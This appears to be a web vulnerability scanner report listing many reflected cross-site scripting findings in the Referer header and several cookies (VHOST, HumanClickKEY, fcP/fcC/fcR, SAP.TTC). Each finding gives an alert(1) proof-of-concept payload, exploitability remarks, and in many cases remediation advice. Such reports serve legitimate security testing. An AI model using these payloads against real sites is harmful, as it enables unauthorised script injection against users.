The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99cfc"><script>alert(1)</script>5410b1df95 was submitted in the Referer HTTP header. This input was echoed as 99cfc\"><script>alert(1)</script>5410b1df95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b8d9"><script>alert(1)</script>a3b8e5a18ac was submitted in the Referer HTTP header. This input was echoed as 4b8d9\"><script>alert(1)</script>a3b8e5a18ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 274f2'%3balert(1)//2101c281023 was submitted in the Referer HTTP header. This input was echoed as 274f2';alert(1)//2101c281023 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the VHOST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80f67</script><script>alert(1)</script>2c17b840303 was submitted in the VHOST cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the VHOST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 284c6</script><script>alert(1)</script>affb05762de was submitted in the VHOST cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the VHOST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e054a</script><script>alert(1)</script>70576b0a72f was submitted in the VHOST cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the VHOST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2859f</script><script>alert(1)</script>037a63493f4 was submitted in the VHOST cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the VHOST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7dec0</script><script>alert(1)</script>bda20c7d112 was submitted in the VHOST cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the VHOST cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5312d"><script>alert(1)</script>78386a6f3a8 was submitted in the VHOST cookie. This input was echoed as 5312d\"><script>alert(1)</script>78386a6f3a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the HumanClickKEY cookie is copied into the HTML document as plain text between tags. The payload ed0e7<script>alert(1)</script>c595c19c2b8 was submitted in the HumanClickKEY cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the fcP.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e8cc'-alert(1)-'d54652d0072 was submitted in the fcP.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fcC.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acb17'-alert(1)-'4c006192ad was submitted in the fcC.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fcP.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df408'-alert(1)-'b17fbb93900 was submitted in the fcP.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fcR.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2c31'-alert(1)-'85da044d06 was submitted in the fcR.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fcC.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e610'-alert(1)-'74497c02a87 was submitted in the fcC.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fcP.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93936'-alert(1)-'1110737f69 was submitted in the fcP.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fcR.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3e51'-alert(1)-'24e4270f356 was submitted in the fcR.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the SAP.TTC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77350'-alert(1)-'2991cbf0eee was submitted in the SAP.TTC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.